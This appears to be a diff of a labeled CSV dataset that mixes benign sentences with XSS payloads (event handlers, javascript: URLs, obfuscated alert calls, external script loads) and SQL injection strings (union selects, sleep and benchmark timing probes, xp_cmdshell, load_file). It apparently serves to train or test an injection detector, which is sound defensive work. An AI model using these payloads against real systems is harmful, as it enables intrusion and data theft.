id=x></nofram,1,XSS,8592 -Let's choose a location for the party.,0,normal,23952 -1 ) as jqbp where 5407 = 5407 and 4595 = 4595#,2,SQLi,13581 +1'+ ( select hett where 7228 = 7228,2,SQLi,20018 +<style>:target {color: red;}</style><tr id=x style,1,XSS,2100 +<style>:target {color:red;}</style><progress id=x ,1,XSS,8530 +"1%"" union all select null,null#",2,SQLi,13346 +<multicol onpointermove=alert(1)>XSS</multicol>,1,XSS,8514 +1' ) as xagu where 9088 = 9088 ( select ( case whe,2,SQLi,16023 +"1"" ) where 2839 = 2839 and 5556 = ( select count (",2,SQLi,16640 +"<iframe src=""vbscript:document.vulnerable=true;"">",1,XSS,1528 +"<textarea onmouseover=""alert(1)"">test</textarea>",1,XSS,8594 +I need to select a playlist for the road trip.,0,normal,23949 +"1%' ) union all select null,null,null,null,null,nu",2,SQLi,13583 "<BR SIZE=""&{javascript:alert(1)}"">",1,XSS,750 "`""'><img src=xxx:x onerror\x0D=javascript:alert(1)",1,XSS,612 -"<acronym onbeforepaste=""alert(1)"" contenteditable>",1,XSS,8053 -"-5989%"" union all select 3581,3581,3581,3581,3581-",2,SQLi,19253 -"1%"" ) and ( select * from ( select ( sleep ( 5 ) )",2,SQLi,15878 -Delete the outdated posts.,0,normal,22717 -"-8869"" where 3019 = 3019 union all select 3019,301",2,SQLi,20139 -1 ) where 4710 = 4710 procedure analyse ( extractv,2,SQLi,14055 -><script+src=https://m.addthis.com/live/red_lojson,1,XSS,9807 -<time onpointermove=alert(1)>XSS</time>,1,XSS,5176 -1 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) |,2,SQLi,17407 -"{""id"":null,""firstName"":""Lim"",""lastName"":""Lilian"",""",0,normal,27191 -1 ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240 ,2,SQLi,15237 -1' ) and 5999 = 5879,2,SQLi,21162 -globalThis[`al`+/ert/.source]`1`,1,XSS,9388 -<button onReverse=javascript:alert(1)>,1,XSS,9658 -"1"" where 5477 = 5477",2,SQLi,19231 -select * from users where id = '1' or ||/1 = 1 uni,2,SQLi,11380 -"<i onbeforecut=""alert(1)"" contenteditable>test</i>",1,XSS,7837 -1' ) ) as oocd where 2919 = 2919 or 8384 = like ( ,2,SQLi,18073 -"<del onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,2031 -1 where 5443 = 5443,2,SQLi,17979 -1' where 8482 = 8482 or sleep ( 5 ) #,2,SQLi,16186 -"1"" ) ) or 4240 = ( select 4240 from pg_sleep ( 5 )",2,SQLi,20371 -"<body draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,4053 -1' ) or 5286 = ( select count ( * ) from all_users,2,SQLi,12106 +"<tfoot onmouseout=""alert(1)"">test</tfoot>",1,XSS,8055 +1' ) as xhmm where 8092 = 8092 union all select nu,2,SQLi,19251 +select pg_sleep ( 5 ) --,2,SQLi,19854 +"1' union all select null,null,null,null,null,null,",2,SQLi,19872 +Where did you find that cozy reading nook?,0,normal,23783 +"1"" ) where 6236 = 6236 or 8514 = benchmark ( 50000",2,SQLi,15235 +><script+src=https://ulogin.ru/token.php?callback=,1,XSS,9809 +"<img onmousedown=""alert(1)"">test</img>",1,XSS,5178 +Select your observe.,0,normal,24980 +select,0,normal,26639 +1 ) as sglv where 7676 = 7676,2,SQLi,16845 +"1"" ) ) as uqem where 3521 = 3521",2,SQLi,21160 +window['a'+'l'+'e'+'r'+'t'](),1,XSS,9390 +<button onRowExit=javascript:alert(1)>,1,XSS,9660 +1,0,normal,26677 +? or 1 = 1 --,2,SQLi,11382 +"<li onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,7839 +"-1475"" ) union all select 8611,8611,8611#",2,SQLi,15241 +"<style>:target {color:red;}</style><b id=x style=""",1,XSS,2032 +1'|| ( select 'czos' from dual where 6814 = 6814,2,SQLi,20544 +"1%' union all select null,null,null,null,null,null",2,SQLi,16178 +"1"" where 2642 = 2642 or 8315 = ( select count ( * ",2,SQLi,20369 +"<menu draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,4055 +"-6400 ) ) union all select 4650,4650,4650--",2,SQLi,12108 <img src/onerror=prompt(8)>,1,XSS,349 -The guards force the inmates to select a shawish (,0,normal,25435 -<script>var script = document.getElementsByTagName,1,XSS,9295 -1,0,normal,26729 -1 where 6169 = 6169 ( select ( case when ( 5451 = ,2,SQLi,20681 -Sports book betting odds 4 select your font face.,0,normal,25525 -1%' ) ) ) or 5356 = ( select count ( * ) from sysu,2,SQLi,22140 -<track onpointerup=alert(1)>XSS</track>,1,XSS,3737 -"1234 ' AND 1 = 0 UNION ALL SELECT 'admin', '81dc9b",2,SQLi,11980 -1' and ( 3020 = 3020 ) *6703 and 'hnvf' = 'hnvf,2,SQLi,16636 -Insert the SIM card tray into the phone.,0,normal,22986 -"<dialog onmouseleave=""alert(1)"">test</dialog>",1,XSS,4261 -"-9947"" ) ) ) union all select 8765,8765,8765,8765,",2,SQLi,19737 -"&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|",1,XSS,1563 -"1"" ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) ",2,SQLi,17977 -"1%"" ) ) union all select null,null,null,null,null,",2,SQLi,22137 -<element id=x tabindex=1 onfocus=alert(1)></elemen,1,XSS,5624 -Select redo.,0,normal,24607 -The county voters were the freeholders; but in the,0,normal,25465 -Select your account name at the top right of the s,0,normal,25569 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2756 -<animatetransform onpointerleave=alert(1)>XSS</ani,1,XSS,3213 -"<a onbeforepaste=""alert(1)"" contenteditable>test</",1,XSS,7402 -I need to decide where to go for a weekend getaway,0,normal,23694 -Select power.,0,normal,24630 -not,0,normal,23132 -1 exec sp_ ( or exec xp_ ),2,SQLi,12057 -Insert a USB drive.,0,normal,22784 -I need to decide where to go for shopping.,0,normal,23957 -<dd onpointerleave=alert(1)>XSS</dd>,1,XSS,4722 -<svg><xmp onload=alert(1)></xmp>,1,XSS,8836 -"-3349 ) ) ) union all select 6553,6553#",2,SQLi,12440 -"<basefont oncut=""alert(1)"" contenteditable>test</b",1,XSS,2270 -"select * from users where id = 1 or ""%["" or 1 = 1 ",2,SQLi,11465 -<blockquote onpointerup=alert(1)>XSS</blockquote>,1,XSS,5966 -AND 1 = utl_inaddr.get_host_address ( ( SELECT glo,2,SQLi,11585 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10723 -"<listing onmousedown=""alert(1)"">test</listing>",1,XSS,8255 --4828%' ) or 8678 = 5745#,2,SQLi,15896 -1'+ ( select 'luhy' where 3112 = 3112 and ( 3020 =,2,SQLi,17703 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) #",2,SQLi,20875 -<progress id=x tabindex=1 onactivate=alert(1)></pr,1,XSS,4097 -<style>:target {transform: rotate(180deg);}</style,1,XSS,6460 -ORDER BY SLEEP(5)#,2,SQLi,10406 -Specify filters where required.,0,normal,23297 -&lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;,1,XSS,1566 -"-1050"" ) ) or 4493 = utl_inaddr.get_host_address (",2,SQLi,16809 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3629 -"<style>@keyframes x{}</style><aside style=""animati",1,XSS,7712 -on,0,normal,23125 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9#",2,SQLi,10541 -"><iframe src=javascript:alert(XSS)"">",1,XSS,9556 -"{""id"":null,""name"":""GardevoirMega Gardevoir""}",0,normal,27367 -"1 AND ELT(1337=1337,SLEEP(5))",2,SQLi,11257 -Select a topic for a blog post.,0,normal,24083 -For a brief summary of the options to select in ke,0,normal,26182 -"<strike draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,7112 -1' ) ) as xebq where 7959 = 7959 union all select ,2,SQLi,13339 -"{""id"":null,""firstName"":""Wei Li"",""lastName"":""Lam"",""",0,normal,26768 -SELECT,0,normal,25691 -stored,0,normal,23158 -1' and 6414 = ( select count ( * ) from rdb$fields,2,SQLi,21179 -<style>:target {color:red;}</style><menu id=x styl,1,XSS,7277 -1 and sleep 5--,2,SQLi,11156 -"1"" where 9521 = 9521 or ( select * from ( select (",2,SQLi,16421 -"-1597"" where 5933 = 5933 or 3038 = 3038",2,SQLi,14085 -1 ) as caoa where 6139 = 6139 union all select nul,2,SQLi,18919 -; exec master..xp_cmdshell,2,SQLi,10149 -1' where 1692 = 1692,2,SQLi,21918 -Where's the bike path?,0,normal,23596 -<script ~~~>confirm(1)</script ~~~>,1,XSS,9724 -"<tfoot onclick=""alert(1)"">test</tfoot>",1,XSS,1781 -"1"" ) ) ) and 9254 = ( select count ( * ) from rdb$",2,SQLi,21357 -1'|| ( select 'znba' where 8323 = 8323,2,SQLi,15599 -<button onFilterChange=javascript:alert(1)>,1,XSS,9614 -"<big draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,7464 -1' ) ) as tley where 3539 = 3539,2,SQLi,15128 -"<header onkeydown=""alert(1)"" contenteditable>test<",1,XSS,4423 -"-8040"" ) ) ) or make_set ( 3916 = 6787,6787 ) and ",2,SQLi,17199 -"<datalist onmouseup=""alert(1)"">test</datalist>",1,XSS,2680 -1' ) ) as qcgf where 9656 = 9656 or 5356 = ( selec,2,SQLi,20445 -Calculate sums where needed.,0,normal,23256 -Insert the new SIM card.,0,normal,22752 -select case when 3661 = 9315 then 1 else null end-,2,SQLi,15336 -1 ) ) ) and ( select * from ( select ( sleep ( 5 ),2,SQLi,20003 -"{""id"":null,""name"":""KingEtemon""}",0,normal,27165 -"<head><META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""tex",1,XSS,1522 -"1"" ) as tnux where 4888 = 4888 rlike ( select * fr",2,SQLi,14907 -1' ) ) as nlfq where 3410 = 3410 or extractvalue (,2,SQLi,16561 -<svg><hr onload=alert(1)></hr>,1,XSS,5031 -document.scripts.length,1,XSS,5012 -( case when 5640 = 5640 then 5640 else null end ),2,SQLi,22345 -"1%' ) procedure analyse ( extractvalue ( 9255,conc",2,SQLi,20999 -UNION ALL SELECT NULL,2,SQLi,10720 -"select * from users where id = 1 or ""@;"" = 1 or 1 ",2,SQLi,11959 -<multicol onpointerover=alert(1)>XSS</multicol>,1,XSS,3592 -1 or 9643 = ( select count ( * ) from domain.domai,2,SQLi,17456 -1 ) ) as gobw where 3496 = 3496 union all select n,2,SQLi,16798 -"<col draggable=""true"" ondragend=""alert(1)"">test</c",1,XSS,3906 -"<ins draggable=""true"" ondragend=""alert(1)"">test</i",1,XSS,2447 -"<style>@keyframes slidein {}</style><map style=""an",1,XSS,7721 -"1"" ) ) ) and ( select * from ( select ( sleep ( 5 ",2,SQLi,22065 -"-9078 union all select 3779,3779,3779,3779,3779,37",2,SQLi,19255 -"<address onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,8585 -select sleep ( 5 ) and ( 'pwpc' = 'pwpc,2,SQLi,21606 -"select * from generate_series ( 9964,9964,case whe",2,SQLi,18213 -[citelol]: (javascript:prompt(document.cookie)),1,XSS,9417 -"<cite onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,7093 -1 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) # ,2,SQLi,15952 -"<template onmouseout=""alert(1)"">test</template>",1,XSS,2057 -"{""id"":null,""firstName"":""Ah Chai"",""lastName"":""Wong""",0,normal,27072 -select * from users where id = 1 <@1$ union select,2,SQLi,11793 -<sub onpointerover=alert(1)>XSS</sub>,1,XSS,2305 -"-6809"" ) ) or 5903 = ( 'qqpjq'|| ( select case 590",2,SQLi,16997 -<tbody id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,4554 -call regexp_substring ( repeat ( right ( char ( 23,2,SQLi,18499 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,14506 -"1;(load_file(char(47,101,116,99,47,112,97,115, ...",2,SQLi,10086 -<frameset id=x tabindex=1 onactivate=alert(1)></fr,1,XSS,8388 -"<rp onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,6595 -"{""id"":null,""name"":""Jynx""}",0,normal,26829 -"{""id"":null,""name"":""give""}",0,normal,26908 -<style>:target {color: red;}</style><iframe id=x s,1,XSS,5347 +The Health Care Select Sector SPDR ETF (XLV) jumpe,0,normal,25432 +<script>var x = safe123.onclick;safe123.onclick = ,1,XSS,9297 +I need to decide where to go for a spa day.,0,normal,23684 +"1"" ) ) ) and 2006 = 2006",2,SQLi,20679 +Stearns and Foster: Up to $600 off select mattress,0,normal,25522 +-6764' ) or 2314 = 2017--,2,SQLi,20906 +<style>:target {transform: rotate(180deg);}</style,1,XSS,3739 +select * from users where id = 1 + ( \. ) union se,2,SQLi,11982 +1%' ) ) or 2367 = ( select count ( * ) from rdb$fi,2,SQLi,14232 +Plant some tall trees in your backyard.,0,normal,22983 +"<picture onmouseenter=""alert(1)"">test</picture>",1,XSS,4263 +1' ) ) as fusi where 2788 = 2788 or 8514 = benchma,2,SQLi,19735 +&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&g,1,XSS,1564 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,14957 +"-9136%"" ) union all select 3081,3081,3081,3081,308",2,SQLi,22135 +"<cite onmouseleave=""alert(1)"">test</cite>",1,XSS,5626 +Select paste.,0,normal,24604 +1' in boolean mode ) and 4386 = utl_inaddr.get_hos,2,SQLi,16075 +"1 ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ",2,SQLi,14061 +"<style onmouseover=""alert(1)"">test</style>",1,XSS,2757 +"<form oncopy=""alert(1)"" contenteditable>test</form",1,XSS,3215 +<base id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,7404 +I'm thinking of where to take a photography class.,0,normal,23691 +Select reload.,0,normal,24627 +primary,0,normal,23129 +"""a"""" or 3 = 3--""",2,SQLi,12059 +Create a sculpture.,0,normal,22781 +"-9582' ) where 4397 = 4397 union all select 4397,4",2,SQLi,19023 +<label onblur=alert(1) tabindex=1 id=x></label><in,1,XSS,4724 +"<STYLE>.{background-image:url(""javascript:alert(''",1,XSS,8838 +select ( case when ( 2774 = 5503 ) then 2774 else ,2,SQLi,12442 +<dir onpointermove=alert(1)>XSS</dir>,1,XSS,2271 +admin' or '1' = '1'#,2,SQLi,11467 +"<style>@keyframes x{}</style><center style=""animat",1,XSS,5968 +"select * from users where id = 1 or "",,"" = 1 or 1 ",2,SQLi,11587 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10725 +"<ins draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,8257 +"-6772"" ) ) or 9323 = 9323#",2,SQLi,15888 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,17701 +"1"" ) where 9648 = 9648 and elt ( 1210 = 1210,sleep",2,SQLi,17873 +<img id=x tabindex=1 ondeactivate=alert(1)></img><,1,XSS,4099 +"<noframes ondblclick=""alert(1)"">test</noframes>",1,XSS,6462 +(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#,2,SQLi,10408 +Select your fashion.,0,normal,24888 +&lt;br size=\&quot;&amp;{alert(&#039;XSS&#039;)}\&,1,XSS,1567 +"-9749"" where 7083 = 7083 or make_set ( 7577 = 1182",2,SQLi,16807 +"<abbr onmouseenter=""alert(1)"">test</abbr>",1,XSS,3631 +"<ul onmousedown=""alert(1)"">test</ul>",1,XSS,7714 +by,0,normal,23122 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#",2,SQLi,10543 +>><marquee><img src=x onerror=confirm(1)></marquee,1,XSS,9558 +1 ) as iovi where 3910 = 3910 or 5356 = ( select c,2,SQLi,21632 +"1 AND ELT(1337=1337,SLEEP(5))# 1337",2,SQLi,11259 +Kohl's: $50 off select luggage purchases of $200 o,0,normal,25919 +"For example, if you tap to select one part of a ho",0,normal,26179 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7114 +1' ) rlike ( select ( case when ( 7689 = 7689 ) th,2,SQLi,13341 +"-6108' ) union all select 2519,2519,2519,2519--",2,SQLi,16638 +select me please,0,normal,25688 +-7773' or 5903 = ( 'qqpjq'|| ( select case 5903 wh,2,SQLi,22317 +Select the perfect present for the occasion.,0,normal,24136 +"<style>@keyframes x{}</style><cite style=""animatio",1,XSS,7279 +1 and sleep(5)--,2,SQLi,11158 +1'|| ( select 'mgel' where 3591 = 3591 and 6055 = ,2,SQLi,19488 +"{""id"":null,""firstName"":""Chan"",""lastName"":""Koksoon""",0,normal,27305 +"1"" ) where 5358 = 5358",2,SQLi,18917 +")) or sleep(__TIME__)=""",2,SQLi,10151 +"-5595"" ) ) as xttj where 4562 = 4562 union all sel",2,SQLi,21916 +length,0,normal,23189 +<</script/script><script>eval('\\u'+'0061'+'lert(1,1,XSS,9726 +<ul onpointerenter=alert(1)>XSS</ul>,1,XSS,1782 +"1"" where 8234 = 8234",2,SQLi,20275 +Randomly select cards.,0,normal,24806 +<button onFocus=javascript:alert(1)>,1,XSS,9616 +"<style>@keyframes x{}</style><template style=""anim",1,XSS,7466 +"-3347%"" or 9323 = 9323#",2,SQLi,15120 +"<style draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,4425 +"1' ) ) or row ( 1045,7562 ) > ( select count ( * )",2,SQLi,19338 +<select onpointerover=alert(1)>XSS</select>,1,XSS,2681 +1%' and 8189 = ( select count ( * ) from sysibm.sy,2,SQLi,20443 +Join tables where possible.,0,normal,23253 +Select a song to set the mood.,0,normal,24206 +1' ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240,2,SQLi,15328 +1'+ ( select qpaf where 7859 = 7859 or ( select * ,2,SQLi,15148 +"{""id"":null,""firstName"":""Sam"",""lastName"":""Tan"",""spe",0,normal,27411 +"<a href=""javascript#document.vulnerable=true;"">",1,XSS,1523 +"1%"" procedure analyse ( extractvalue ( 9255,concat",2,SQLi,14900 +1'+ ( select jxgx where 7446 = 7446 and 8189 = ( s,2,SQLi,15060 +<li id=x tabindex=1 onfocus=alert(1)></li>,1,XSS,5033 +"<style>@keyframes x{}</style><span style=""animatio",1,XSS,5014 +Select the perfect gift.,0,normal,22607 +"1 ) and updatexml ( 3393,concat ( 0x2e,0x7171706a7",2,SQLi,20997 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10722 +select * from users where id = 1.<@$ or 1 = 1 -- 1,2,SQLi,11961 +<style>:target {color: red;}</style><svg id=x styl,1,XSS,3594 +1%' ) or 2367 = ( select count ( * ) from rdb$fiel,2,SQLi,20555 +1' ) as jztg where 1222 = 1222 or sleep ( 5 ) #,2,SQLi,16796 +"<div onmouseover=""alert(1)"">test</div>",1,XSS,3908 +"<abbr onmouseup=""alert(1)"">test</abbr>",1,XSS,2448 +"<img onclick=""alert(1)"">test</img>",1,XSS,7723 +1' ) ) as cbka where 3176 = 3176 and 8407 = ( sele,2,SQLi,22063 +"If you want access to the comforts of home, select",0,normal,26043 +<rt id=x tabindex=1 ondeactivate=alert(1)></rt><in,1,XSS,8587 +"-4330' union all select 3059,3059,3059,3059,3059,3",2,SQLi,21604 +1' ) ) as ylyq where 2953 = 2953 and 2716 = ( sele,2,SQLi,19643 +[test](javascript://%0d%0aprompt(1)),1,XSS,9419 +<svg><applet onload=alert(1)></applet>,1,XSS,7095 +Select brandy.,0,normal,24518 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2058 +"{""id"":null,""firstName"":""Siew"",""lastName"":""Peiying""",0,normal,27069 +"select * from users where id = 1 or ""{1"" = 1 or 1 ",2,SQLi,11795 +<style>:target {color:red;}</style><hgroup id=x st,1,XSS,2306 +1 where 8578 = 8578 and 4770 = 4474--,2,SQLi,16995 +"<isindex onmousemove=""alert(1)"">test</isindex>",1,XSS,4556 +"-6194"" or 4747 = dbms_utility.sqlid_to_sqlhash ( (",2,SQLi,18497 +1 ) as tngy where 8956 = 8956 rlike ( select ( cas,2,SQLi,18606 +1 or sleep(__TIME__)#,2,SQLi,10088 +<code id=x tabindex=1 onfocusin=alert(1)></code>,1,XSS,8390 +<pre onpointerout=alert(1)>XSS</pre>,1,XSS,6597 +"{""id"":null,""firstName"":""Benson"",""lastName"":""Tan"",""",0,normal,26826 +"{""id"":null,""firstName"":""May"",""lastName"":""Lem"",""spe",0,normal,26905 +"<rb onkeydown=""alert(1)"" contenteditable>test</rb>",1,XSS,5349 "<image src=""javascript:alert(1)"">",1,XSS,642 -"<div style=""position:absolute;top:0;left:0;width:1",1,XSS,9092 -<details onfocusout=alert(1) tabindex=1 id=x></det,1,XSS,5362 -"1"" ) ) ) or ( select 2* ( if ( ( select * from ( s",2,SQLi,16011 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4428 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,20495 -"<span draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,1897 -Select bowl.,0,normal,24527 -"select * from generate_series ( 2673,2673,case whe",2,SQLi,22037 +"<div id=""1""><form id=""test""></form><button form=""t",1,XSS,9094 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5364 +"1' where 3700 = 3700 union all select null,null,nu",2,SQLi,16003 "<applet onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,4430 -"1"" ) where 2834 = 2834 ( select ( case when ( 5451",2,SQLi,12470 -Order a refreshing drink.,0,normal,22689 -"-4756"" ) ) union all select 6846,6846,6846,6846,68",2,SQLi,20796 -<tr onpointerenter=alert(1)>XSS</tr>,1,XSS,3775 -"1' ) ) and make_set ( 1002 = 3556,3556 ) and ( ( '",2,SQLi,17572 -) ) or pg_sleep ( __TIME__ ) --,2,SQLi,11509 +-2102' where 3644 = 3644 or 5023 = ctxsys.drithsx.,2,SQLi,20493 +"<applet oncut=""alert(1)"" contenteditable>test</app",1,XSS,1898 +1 ) union all select null--,2,SQLi,22444 +"1"" ) rlike sleep ( 5 ) and ( ""efoq"" like ""efoq",2,SQLi,16566 +"<style>@keyframes x{}</style><picture style=""anima",1,XSS,4432 +"1"" or ( select * from ( select ( sleep ( 5 ) ) ) y",2,SQLi,12472 +Select your preferred flavor.,0,normal,24268 +-8233' or 9538 = 1882#,2,SQLi,20794 +<textarea onpointerenter=alert(1)>XSS</textarea>,1,XSS,3777 +"1"" or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||ch",2,SQLi,17570 +or 3 = 3,2,SQLi,11511 "<script> Object.prototype.div=['1','<img src onerr",1,XSS,217 -<u onfocusout=alert(1) tabindex=1 id=x></u><input ,1,XSS,5855 -"<img onmouseover=""alert(1)"">test</img>",1,XSS,5292 -1'|| ( select 'lkmh' where 7659 = 7659,2,SQLi,20162 -select * from users where id = 1 + $+%1 union sele,2,SQLi,11588 -1 ) and 6414 = ( select count ( * ) from rdb$field,2,SQLi,21648 -select * from users where id = '1' + $+*$ union se,2,SQLi,11848 -"1"" where 3764 = 3764",2,SQLi,13055 -<style>:target {transform: rotate(180deg);}</style,1,XSS,4222 -In addition to many other researches besides those,0,normal,26015 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10495 -1' ) as pkis where 3446 = 3446 or 2633 = dbms_pipe,2,SQLi,18700 -"-5344"" union all select 9482,9482,9482,9482,9482,9",2,SQLi,18464 -Select disappear.,0,normal,24685 -"<;STYLE type="";text/css"";>;BODY{background:url("";j",1,XSS,1616 --5134 ) ) ) or 8571 = 8571--,2,SQLi,14401 -"{""id"":null,""name"":""lips""}",0,normal,27505 -<select onpointerenter=alert(1)>XSS</select>,1,XSS,3974 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5861 -"{""id"":null,""name"":""Tankmon""}",0,normal,27503 -"1' ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694",2,SQLi,13760 -select case when 3252 = 9622 then 1 else null end-,2,SQLi,14434 -><script+src=http://a.sm.cn/api/getgamehotboarddat,1,XSS,9791 -Nor is it difficult to imagine the probable course,0,normal,25866 -1' ) ) ) rlike ( select ( case when ( 4076 = 4881 ,2,SQLi,20993 -"<svg onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,1804 -Select your argument.,0,normal,24910 -Extra 5% off Select HP Gaming PCs w/ code: 5GAMER,0,normal,26200 -1'|| ( select 'fbtm' where 1335 = 1335 and exp ( ~,2,SQLi,20285 -"<div style=""binding: url(http://www.securitycompas",1,XSS,1562 -"1' ) ) ) union all select null,null,null,null,null",2,SQLi,22113 -Insert code.,0,normal,23045 -#ERROR!,2,SQLi,22533 -<pre id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,1788 -select pg_sleep ( 5 ) and ( ( '%' = ',2,SQLi,20326 -"admin""/*",2,SQLi,9925 -1 waitfor delay '0:0:5'# opyp,2,SQLi,17932 -"<acronym onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,8136 +"<strike onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,5857 +"<template onpaste=""alert(1)"" contenteditable>test<",1,XSS,5294 +1' ) and 2564 = 3234--,2,SQLi,20160 +"select * from users where id = 1 or "" ) 1"" or 1 = ",2,SQLi,11590 +"select * from generate_series ( 6414,6414,case whe",2,SQLi,21646 +"select * from users where id = 1 or ""{#"" or 1 = 1 ",2,SQLi,11850 +1' ) ) as qgyz where 1547 = 1547 and 8594 = ( sele,2,SQLi,13057 +"<template onmousemove=""alert(1)"">test</template>",1,XSS,4224 +1' and 6414 = ( select count ( * ) from rdb$fields,2,SQLi,21179 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10497 +1 where 7254 = 7254,2,SQLi,19551 +"-9837"" where 7201 = 7201 union all select 7201,720",2,SQLi,18462 +Select fade.,0,normal,24682 +"<;LINK REL="";stylesheet""; HREF="";javascript:alert(",1,XSS,1617 +Select your favorite dish.,0,normal,24282 +-3821' ) or 9323 = 9323#,2,SQLi,18445 +"<h1 oncontextmenu=""alert(1)"">test</h1>",1,XSS,3976 +<del onpointermove=alert(1)>XSS</del>,1,XSS,5863 +"1%"" ) ) ) union all select null,null,null,null#",2,SQLi,16209 +1'|| ( select 'kuxp' where 7123 = 7123 and 1688 = ,2,SQLi,13762 +Select your preferred mode of transportation.,0,normal,24150 +><script+src=https://mkto.uber.com/index.php/form/,1,XSS,9793 +Note: This additional discount is for select Prime,0,normal,25863 +-2604 ) ) as sekb where 6897 = 6897 or 1000 = 7683,2,SQLi,20991 +<optgroup onpointerover=alert(1)>XSS</optgroup>,1,XSS,1805 +Select your talk.,0,normal,24907 +Females can’t use them to select mates.,0,normal,26197 +"1"" ) ) or 2633 = dbms_pipe.receive_message ( chr (",2,SQLi,20283 +"&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|",1,XSS,1563 +"-9356 or elt ( 1032 = 1032,3623 ) -- izgi",2,SQLi,22111 +Filter photos.,0,normal,23042 +"{""id"":null,""firstName"":""Jason"",""lastName"":""Khng"",""",0,normal,27189 +"<data draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,1789 +"1"" and exp ( ~ ( select * from ( select concat ( 0",2,SQLi,20324 +"admin"" or ""1""=""1""--",2,SQLi,9927 +"1%"" ) and row ( 6237,7469 ) > ( select count ( * )",2,SQLi,17930 +<nav onpointerout=alert(1)>XSS</nav>,1,XSS,8138 "<HTML><BODY><?xml:namespace prefix=""t"" ns=""urn:sch",1,XSS,773 -ORDER BY 17#,2,SQLi,10290 -1 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||,2,SQLi,16228 -1'+ ( select 'qbdh' where 4006 = 4006 and 7533 = 7,2,SQLi,17478 -"-8943%' ) union all select 7710,7710#",2,SQLi,14768 -"<slot onkeyup=""alert(1)"" contenteditable>test</slo",1,XSS,3598 +ORDER BY 19#,2,SQLi,10292 +1 where 1092 = 1092,2,SQLi,16220 +"1"" and ( select * from ( select ( sleep ( 5 ) ) ) ",2,SQLi,17476 +Where's the SQL tutorial?,0,normal,23400 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3600 "<html onMouseEnter html onMouseEnter=""javascript:p",1,XSS,395 -"1"" where 5552 = 5552 or 5356 = ( select count ( * ",2,SQLi,17920 -"<noscript onkeypress=""alert(1)"" contenteditable>te",1,XSS,3428 -Modi and his government do not have the courage to,0,normal,26491 -"<a onmouseover=""alert(1)"">test</a>",1,XSS,4403 -"<dl draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,4949 -"<frame onkeydown=""alert(1)"" contenteditable>test</",1,XSS,5126 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,14957 -"1%"" ) and 8148 = like ( 'abcdefg',upper ( hex ( ra",2,SQLi,14303 -Where's the perfect place to enjoy nature?,0,normal,23805 -Where to start the query?,0,normal,23449 -1 ) where 5651 = 5651,2,SQLi,20178 -"<style>@keyframes x{}</style><center style=""animat",1,XSS,8832 -Where's the synagogue?,0,normal,23531 -1'|| ( select 'nwve' where 7721 = 7721,2,SQLi,18274 -<applet onpointerdown=alert(1)>XSS</applet>,1,XSS,5718 -1 ) ) ) or 4240 = ( select 4240 from pg_sleep ( 5 ,2,SQLi,22176 -<style>@keyframes slidein {}</style><dialog style=,1,XSS,2030 -"{""id"":null,""firstName"":""Goh"",""lastName"":""Katherine",0,normal,27608 +Select a flavor for the drink.,0,normal,24164 +"<head ondblclick=""alert(1)"">test</head>",1,XSS,3430 +Modi nd his Govt have no guts to ban any of these ,0,normal,26488 +<body id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,4405 +"<video oncut=""alert(1)"" contenteditable>test</vide",1,XSS,4951 +"<center ondblclick=""alert(1)"">test</center>",1,XSS,5128 +"-7565' ) ) union all select 